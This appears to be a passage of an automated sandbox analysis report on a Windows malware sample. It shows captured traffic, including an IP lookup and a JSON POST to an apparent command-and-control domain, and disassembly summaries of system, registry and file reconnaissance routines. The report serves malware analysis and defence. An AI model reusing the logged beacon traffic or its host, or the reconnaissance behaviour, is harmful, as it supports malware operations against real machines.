                                                        Dec 28, 2024 09:47:10.874826908 CET1236OUTData Raw: 66 74 61 64 44 42 34 5a 31 47 31 53 77 74 43 50 4c 41 5c 2f 67 33 78 33 34 32 34 4d 38 51 38 77 34 63 7a 6e 77 37 38 4f 61 58 41 66 44 65 52 38 50 5a 66 77 31 69 33 67 38 46 52 6f 30 63 31 7a 6a 44 77 6e 55 71 5a 68 6a 36 2b 44 77 57 48 77 7a 7a
                                                        Data Ascii: ftadDB4Z1G1SwtCPLA\/g3x3424M8Q8w4cznw78OaXAfDeR8PZfw1i3g8FRo0c1zjDwnUqZhj6+DwWHwzzLF01KpOFSvjMTKMJTliakEowkf7x\/D+QqJfBXif4lajoPw58E6Pfa\/4z8eeIdH8I+FdJsEZnutc168jsLN7qVYLlbPS7Lznv9X1KaE2umaZa3eoXjR2ttM6z43M3t\/+rP6frXP+JfC2k+L9GutC12F7jTbwATw
                                                        Dec 28, 2024 09:47:10.916451931 CET63036OUTData Raw: 2f 77 43 46 64 70 4c 46 50 61 65 47 6f 4c 61 35 69 38 37 46 31 41 77 53 34 66 7a 38 37 5c 2f 4e 6b 43 5a 6b 34 4a 41 7a 30 42 50 55 38 31 46 42 2b 7a 33 38 4c 6f 49 4c 2b 32 6a 30 4c 5c 2f 52 39 54 75 35 62 32 39 69 4d 69 42 4a 37 69 5a 6b 5a 32
                                                        Data Ascii: /wCFdpLFPaeGoLa5i87F1AwS4fz87\/NkCZk4JAz0BPU81FB+z38LoIL+2j0L\/R9Tu5b29iMiBJ7iZkZ2cJCu4bo1IDZ75JzXtYX6KXEeH+p1Z8UZXiMZhs4zzN6k62FxtXB4v+18g\/s\/DZVjcFUxrWJyXKs3VDMMvy+pWcMFl2XZdkeFlDCYSlUXzWO+nFwpi542lR4PzvB5fism4ayiFKljMsWYYStkfEMsdjM6wWYf2fJ
                                                        Dec 28, 2024 09:47:10.916527987 CET1236OUTData Raw: 62 35 63 35 37 65 6c 4d 5a 63 38 6a 72 57 6d 47 36 66 31 5c 2f 4d 61 6a 45 5c 2f 31 6b 6c 44 5c 2f 41 48 6a 2b 48 38 68 54 31 58 48 4a 36 30 4d 75 65 52 31 6f 71 64 50 6e 2b 67 45 56 46 46 46 4b 47 5c 2f 79 5c 2f 56 47 73 4e 76 6e 2b 69 49 5c 2f
                                                        Data Ascii: b5c57elMZc8jrWmG6f1\/MajE\/1klD\/AHj+H8hT1XHJ60MueR1oqdPn+gEVFFFKG\/y\/VGsNvn+iI\/8Aln\/n+9UdWKr1qWQ8ue3A\/wA+tNqdQV\/PNRv1\/D+poOgZT42z+PI+vf8Az7UyiugCSTt+NQP0\/H+hq3Ucnb8aAK2w+3+fwplWKg8vjf8A\/q6dfrjt6e9dACU7Y3p\/L\/Gm0UHQFQNET7\/T\/wCvU9FdA
                                                        Dec 28, 2024 09:47:11.219116926 CET212INHTTP/1.0 503 Service Unavailable
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.54970681.29.149.125805620C:\Users\user\Desktop\A3nofpjN9A.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 28, 2024 09:47:12.161123991 CET284OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 143
                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                        Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                        Dec 28, 2024 09:47:13.520793915 CET212INHTTP/1.0 503 Service Unavailable
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.5497043.218.7.1034435620C:\Users\user\Desktop\A3nofpjN9A.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-28 08:47:06 UTC52OUTGET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
                                                        2024-12-28 08:47:07 UTC224INHTTP/1.1 200 OK
                                                        Date: Sat, 28 Dec 2024 08:47:07 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-12-28 08:47:07 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:47:00
                                                        Start date:28/12/2024
                                                        Path:C:\Users\user\Desktop\A3nofpjN9A.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\A3nofpjN9A.exe"
                                                        Imagebase:0x3d0000
                                                        File size:4'482'048 bytes
                                                        MD5 hash:2115E3FBDA695F11AF734C24EE699E6D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:23.3%
                                                          Total number of Nodes:202
                                                          Total number of Limit Nodes:28
                                                          execution_graph 19945 40b3c0 19946 40b3cb 19945->19946 19947 40b3ee 19945->19947 19951 409290 19946->19951 19958 3d76a0 19946->19958 19948 40b3ea 19952 3d76a0 send 19951->19952 19953 4092e5 19952->19953 19954 409335 WSAIoctl 19953->19954 19955 409392 19953->19955 19954->19955 19956 409366 19954->19956 19955->19948 19956->19955 19957 409371 setsockopt 19956->19957 19957->19955 19959 3d76e6 send 19958->19959 19960 3d76c0 19958->19960 19961 3d76c9 19959->19961 19960->19959 19960->19961 19961->19948 19962 40b400 19963 40b425 19962->19963 19964 40b40b 19962->19964 19967 3d7770 19964->19967 19965 40b421 19968 3d77b6 recv 19967->19968 19969 3d7790 19967->19969 19970 3d7799 19968->19970 19969->19968 19969->19970 19970->19965 20067 3d255d 20068 759f70 20067->20068 20069 3d256c GetSystemInfo 20068->20069 20070 3d2589 20069->20070 20071 3d25a0 GlobalMemoryStatusEx 20070->20071 20076 3d25ec 20071->20076 20072 3d2762 20075 3d27d6 KiUserCallbackDispatcher 20072->20075 20073 3d263c GetDriveTypeA 20074 3d2655 GetDiskFreeSpaceExA 20073->20074 20073->20076 20074->20076 20077 3d27f8 20075->20077 20076->20072 20076->20073 20078 3d28d9 FindFirstFileW 20077->20078 20079 3d2906 FindNextFileW 20078->20079 20080 3d2928 20078->20080 20079->20079 20079->20080 19971 3d29ff FindFirstFileA 19972 3d2a31 19971->19972 19973 3d2a5c RegOpenKeyExA 19972->19973 19974 3d2a93 19973->19974 19975 3d2ade CharUpperA 19974->19975 19977 3d2b0a 19975->19977 19976 3d2bf9 QueryFullProcessImageNameA 19978 3d2c3b CloseHandle 19976->19978 19977->19976 19980 3d2c64 19978->19980 19979 3d2df1 CloseHandle 19981 3d2e23 19979->19981 19980->19979 20081 3d3d5e 20082 3d3d30 20081->20082 20082->20081 20083 3d3d90 20082->20083 20085 3e0ab0 20082->20085 20088 3e05b0 20085->20088 20087 3e0acd 20087->20082 20089 3e07c7 20088->20089 20090 3e05bd 20088->20090 20089->20087 20090->20089 20091 3e0707 WSAEventSelect 20090->20091 20092 3e07ef 20090->20092 20094 3d76a0 send 20090->20094 20091->20089 20091->20090 20092->20089 20096 3e0847 20092->20096 20098 3e6fa0 20092->20098 20094->20090 20095 3e09e8 WSAEnumNetworkEvents 20095->20096 20097 3e09d0 WSAEventSelect 20095->20097 20096->20089 20096->20095 20096->20097 20097->20095 20097->20096 20099 3e6fd4 20098->20099 20101 3e6feb 20098->20101 20100 3e7207 select 20099->20100 20099->20101 20100->20101 20101->20096 20102 484720 20103 484728 20102->20103 20107 484733 20103->20107 20108 489270 20103->20108 20105 484860 20111 484950 20105->20111 20115 48a440 20108->20115 20110 489297 20110->20105 20114 484966 20111->20114 20112 4849c5 20112->20107 20113 484aa0 gethostname 20113->20112 20113->20114 20114->20112 20114->20113 20142 48a46b 20115->20142 20116 48aa03 RegOpenKeyExA 20117 48ab70 RegOpenKeyExA 20116->20117 20118 48aa27 RegQueryValueExA 20116->20118 20119 48ac34 RegOpenKeyExA 20117->20119 20143 48ab90 20117->20143 20120 48aacc RegQueryValueExA 20118->20120 20121 48aa71 20118->20121 20122 48acf8 RegOpenKeyExA 20119->20122 20141 48ac54 20119->20141 20123 48ab0e 20120->20123 20124 48ab66 RegCloseKey 20120->20124 20121->20120 20126 48aa85 RegQueryValueExA 20121->20126 20125 48ad56 RegEnumKeyExA 20122->20125 20130 48ad14 20122->20130 20123->20124 20129 48ab1e RegQueryValueExA 20123->20129 20124->20117 20127 48ad9b 20125->20127 20125->20130 20128 48aab3 20126->20128 20131 48ae16 RegOpenKeyExA 20127->20131 20128->20120 20134 48ab4c 20129->20134 20130->20110 20132 48addf RegEnumKeyExA 20131->20132 20133 48ae34 RegQueryValueExA 20131->20133 20132->20130 20132->20131 20135 48af43 RegQueryValueExA 20133->20135 20136 48adaa 20133->20136 20134->20124 20135->20136 20137 48b052 RegQueryValueExA 20135->20137 20136->20135 20136->20137 20138 48adc7 RegCloseKey 20136->20138 20140 48afa0 RegQueryValueExA 20136->20140 20137->20136 20137->20138 20138->20132 20139 48a4db 20139->20116 20139->20130 20140->20136 20141->20122 20142->20139 20144 48a794 GetBestRoute2 20142->20144 20145 48a6c7 GetBestRoute2 20142->20145 20143->20119 20144->20142 20145->20142 19982 49a8c0 19983 49a903 recvfrom 19982->19983 19984 49a8e6 19982->19984 19985 49a8ed 19983->19985 19984->19983 19984->19985 19986 49a080 19989 499740 19986->19989 19988 49a09b 19990 499780 19989->19990 19994 49975d 19989->19994 19991 499925 RegOpenKeyExA 19990->19991 19990->19994 19992 49995a RegQueryValueExA 19991->19992 19991->19994 19993 499986 RegCloseKey 19992->19993 19993->19994 19994->19988 19995 49b180 19996 49b19b 19995->19996 19997 49b2e3 19995->19997 19996->19997 20000 49b2a9 getsockname 19996->20000 20002 49b020 closesocket 19996->20002 20003 49af30 19996->20003 20007 49b060 19996->20007 20012 49b020 20000->20012 20002->19996 20004 49af4c 20003->20004 20005 49af63 socket 20003->20005 20004->20005 20006 49af52 20004->20006 20005->19996 20006->19996 20009 49b080 20007->20009 20008 49b0b0 connect 20010 49b0bf WSAGetLastError 20008->20010 20009->20008 20009->20010 20011 49b0ea 20009->20011 20010->20009 20010->20011 20011->19996 20013 49b029 20012->20013 20014 49b052 20012->20014 20015 49b04b closesocket 20013->20015 20016 49b03e 20013->20016 20014->19996 20015->20014 20016->19996 20146 49a920 20147 49a944 20146->20147 20148 49a977 send 20147->20148 20149 49a94b 20147->20149 20150 3d2f17 20157 3d2f2c 20150->20157 20151 3d31d3 20152 3d2fb3 RegOpenKeyExA 20152->20157 20153 3d315c RegEnumKeyExA 20153->20157 20154 3d3046 RegOpenKeyExA 20155 3d3089 RegQueryValueExA 20154->20155 20154->20157 20156 3d313b RegCloseKey 20155->20156 20155->20157 20156->20157 20157->20151 20157->20152 20157->20153 20157->20154 20157->20156 20158 3d31d7 20161 3d31f4 20158->20161 20159 3d3200 20160 3d32dc CloseHandle 20160->20159 20161->20159 20161->20160 20017 408b50 20018 408b6b 20017->20018 20031 408bb5 20017->20031 20018->20031 20033 408b8f 20018->20033 20034 40a550 20018->20034 20020 408bfc 20024 408c35 20020->20024 20025 408c1f connect 20020->20025 20029 408cb2 20020->20029 20020->20031 20021 408cd9 SleepEx getsockopt 20022 408d18 20021->20022 20026 408d43 20022->20026 20022->20029 20023 40a150 getsockname 20032 408dff 20023->20032 20047 40a150 20024->20047 20025->20024 20030 40a150 getsockname 20026->20030 20029->20023 20029->20031 20029->20032 20030->20031 20032->20031 20051 3d78b0 closesocket 20032->20051 20033->20021 20033->20029 20033->20031 20035 40a575 20034->20035 20039 40a597 20035->20039 20053 3d75e0 20035->20053 20037 3d78b0 closesocket 20038 40a713 20037->20038 20038->20020 20040 40a811 setsockopt 20039->20040 20045 40a69b 20039->20045 20046 40a83b 20039->20046 20040->20046 20042 40af56 20043 40af5d 20042->20043 20042->20045 20043->20038 20044 40a150 getsockname 20043->20044 20044->20038 20045->20037 20045->20038 20046->20045 20058 4367e0 ioctlsocket 20046->20058 20048 40a15f 20047->20048 20050 40a1d0 20047->20050 20049 40a181 getsockname 20048->20049 20048->20050 20049->20050 20050->20033 20052 3d78c5 20051->20052 20052->20031 20054 3d7607 socket 20053->20054 20056 3d75ef 20053->20056 20055 3d762b 20054->20055 20055->20039 20056->20054 20057 3d7643 20056->20057 20057->20039 20058->20042 20059 3d20ad 20061 3d20d9 20059->20061 20060 3d20e3 20061->20060 20063 75b180 Sleep 20061->20063 20063->20061 20162 4095b0 20163 4095c8 20162->20163 20165 4095fd 20162->20165 20164 40a150 getsockname 20163->20164 20163->20165 20164->20165 20064 3ed5e0 20065 3ed652 WSAStartup 20064->20065 20066 3ed5f0 20064->20066 20065->20066

                                                          Executed Functions

                                                          Function 0040F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: 1777059f53f099e8739c5aa5917f5856cc92a5dd48e5e48291d0cfa55bb4e9cc
                                                          • Instruction ID: 8959e1a40b15894186e4172d3c41a475c92c306941db5052e74adaf4f0cf68ab
                                                          • Opcode Fuzzy Hash: 1777059f53f099e8739c5aa5917f5856cc92a5dd48e5e48291d0cfa55bb4e9cc
                                                          • Instruction Fuzzy Hash: 7FC27D31A043449FD724CF29C444B6BB7E1AF84314F08867EEC98AB792D775E989CB85
                                                          Function 003D255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 003D2579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 003D25CC
                                                          • GetDriveTypeA.KERNELBASE ref: 003D2647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 003D267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 003D27E2
                                                          • FindFirstFileW.KERNELBASE ref: 003D28F8
                                                          • FindNextFileW.KERNELBASE ref: 003D291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                          • String ID: ;%=$@$`
                                                          • API String ID: 3271271169-3939046150
                                                          • Opcode ID: 23fc76065ed2a789368ef7fb7211b92c02e1b12c54a22115e91e5df582c58967
                                                          • Instruction ID: eefd0b5ad3a15b339226a74a0023e47ae7ed2dfb7147f3faa0accc5163c74c34
                                                          • Opcode Fuzzy Hash: 23fc76065ed2a789368ef7fb7211b92c02e1b12c54a22115e91e5df582c58967
                                                          • Instruction Fuzzy Hash: ECD182B49083199FCB50EF68C58569EBBF0FF44344F018969E898D7251E7749A88CF92
                                                          Function 003D29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1360 3d29ff-3d2a2f FindFirstFileA 1361 3d2a38 1360->1361 1362 3d2a31-3d2a36 1360->1362 1363 3d2a3d-3d2a91 call 859c50 call 859ce0 RegOpenKeyExA 1361->1363 1362->1363 1368 3d2a9a 1363->1368 1369 3d2a93-3d2a98 1363->1369 1370 3d2a9f-3d2b0c call 859c50 call 859ce0 CharUpperA call 758da0 1368->1370 1369->1370 1378 3d2b0e-3d2b13 1370->1378 1379 3d2b15 1370->1379 1380 3d2b1a-3d2b92 call 859c50 call 859ce0 call 758e80 call 758e70 1378->1380 1379->1380 1389 3d2bcc-3d2c66 QueryFullProcessImageNameA CloseHandle call 758da0 1380->1389 1390 3d2b94-3d2ba3 1380->1390 1400 3d2c6f 1389->1400 1401 3d2c68-3d2c6d 1389->1401 1393 3d2ba5-3d2bae 1390->1393 1394 3d2bb0-3d2bca call 758e68 1390->1394 1393->1389 1394->1389 1394->1390 1402 3d2c74-3d2ce9 call 859c50 call 859ce0 call 758e80 call 758e70 1400->1402 1401->1402 1411 3d2dcf-3d2e1c call 859c50 call 859ce0 CloseHandle 1402->1411 1412 3d2cef-3d2d49 call 758bb0 call 758da0 1402->1412 1422 3d2e23-3d2e2e 1411->1422 1423 3d2d99-3d2dad 1412->1423 1424 3d2d4b-3d2d63 call 758da0 1412->1424 1425 3d2e37 1422->1425 1426 3d2e30-3d2e35 1422->1426 1423->1411 1424->1423 1432 3d2d65-3d2d7d call 758da0 1424->1432 1428 3d2e3c-3d2ed6 call 859c50 call 859ce0 1425->1428 1426->1428 1441 3d2ed8-3d2ee1 1428->1441 1442 3d2eea 1428->1442 1432->1423 1438 3d2d7f-3d2d97 call 758da0 1432->1438 1438->1423 1446 3d2daf-3d2dc9 call 758e68 1438->1446 1441->1442 1444 3d2ee3-3d2ee8 1441->1444 1445 3d2eef-3d2f16 call 859c50 call 859ce0 1442->1445 1444->1445 1446->1411 1446->1412
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: ec9df7871a6d2267509419cece600126b96447b060821aa4b752261974cbda91
                                                          • Instruction ID: 956f0acf3ac7dfe95af65b6ea557142c9cde1016dc57dc96f00db734f3e3580b
                                                          • Opcode Fuzzy Hash: ec9df7871a6d2267509419cece600126b96447b060821aa4b752261974cbda91
                                                          • Instruction Fuzzy Hash: 6EE1D6B4908305DFCB50EF68D985A9EBBF4EF58345F01886AE898D7350E7749A48CF42
                                                          Function 003E05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1506 3e05b0-3e05b7 1507 3e07ee 1506->1507 1508 3e05bd-3e05d4 1506->1508 1509 3e05da-3e05e6 1508->1509 1510 3e07e7-3e07ed 1508->1510 1509->1510 1511 3e05ec-3e05f0 1509->1511 1510->1507 1512 3e05f6-3e0620 call 3e7350 call 3d70b0 1511->1512 1513 3e07c7-3e07cc 1511->1513 1518 3e066a-3e068c call 40dec0 1512->1518 1519 3e0622-3e0624 1512->1519 1513->1510 1524 3e07d6-3e07e3 call 3e7380 1518->1524 1525 3e0692-3e06a0 1518->1525 1521 3e0630-3e0655 call 3d70d0 call 3e03c0 call 3e7450 1519->1521 1545 3e07ce 1521->1545 1546 3e065b-3e0668 call 3d70e0 1521->1546 1524->1510 1528 3e06f4-3e06f6 1525->1528 1529 3e06a2-3e06a4 1525->1529 1534 3e07ef-3e082b call 3e3000 1528->1534 1535 3e06fc-3e06fe 1528->1535 1532 3e06b0-3e06e4 call 3e73b0 1529->1532 1532->1524 1551 3e06ea-3e06ee 1532->1551 1549 3e0a2f-3e0a35 1534->1549 1550 3e0831-3e0837 1534->1550 1536 3e072c-3e0754 1535->1536 1541 3e075f-3e078b 1536->1541 1542 3e0756-3e075b 1536->1542 1563 3e0700-3e0703 1541->1563 1564 3e0791-3e0796 1541->1564 1547 3e075d 1542->1547 1548 3e0707-3e0719 WSAEventSelect 1542->1548 1545->1524 1546->1518 1546->1521 1556 3e0723-3e0726 1547->1556 1548->1524 1555 3e071f 1548->1555 1552 3e0a3c-3e0a52 1549->1552 1553 3e0a37-3e0a3a 1549->1553 1558 3e0839-3e0842 call 3e6fa0 1550->1558 1559 3e0861-3e087e 1550->1559 1551->1532 1560 3e06f0 1551->1560 1552->1524 1561 3e0a58-3e0a81 call 3e2f10 1552->1561 1553->1552 1555->1556 1556->1534 1556->1536 1569 3e0847-3e084c 1558->1569 1570 3e0882-3e088d 1559->1570 1560->1528 1561->1524 1577 3e0a87-3e0a97 call 3e6df0 1561->1577 1563->1548 1564->1563 1568 3e079c-3e07c2 call 3d76a0 1564->1568 1568->1563 1573 3e0a9c-3e0aa4 1569->1573 1574 3e0852 1569->1574 1575 3e0893-3e08b1 1570->1575 1576 3e0970-3e0975 1570->1576 1573->1524 1574->1559 1579 3e0854-3e085f 1574->1579 1580 3e08c8-3e08f7 1575->1580 1582 3e097b-3e0989 call 3d70b0 1576->1582 1583 3e0a19-3e0a2c 1576->1583 1577->1524 1579->1570 1590 3e08fd-3e0925 1580->1590 1591 3e08f9-3e08fb 1580->1591 1582->1583 1589 3e098f-3e099e 1582->1589 1583->1549 1592 3e09b0-3e09c1 call 3d70d0 1589->1592 1593 3e0928-3e093f 1590->1593 1591->1593 1597 3e09c3-3e09c7 1592->1597 1598 3e09a0-3e09ae call 3d70e0 1592->1598 1599 3e0945-3e096b 1593->1599 1600 3e08b3-3e08c2 1593->1600 1602 3e09e8-3e0a03 WSAEnumNetworkEvents 1597->1602 1598->1583 1598->1592 1599->1600 1600->1576 1600->1580 1604 3e0a05-3e0a17 1602->1604 1605 3e09d0-3e09e6 WSAEventSelect 1602->1605 1604->1605 1605->1598 1605->1602
                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,?,?), ref: 003E0711
                                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 003E09DD
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 003E09FC
                                                          Strings
                                                          Memory Dump Source
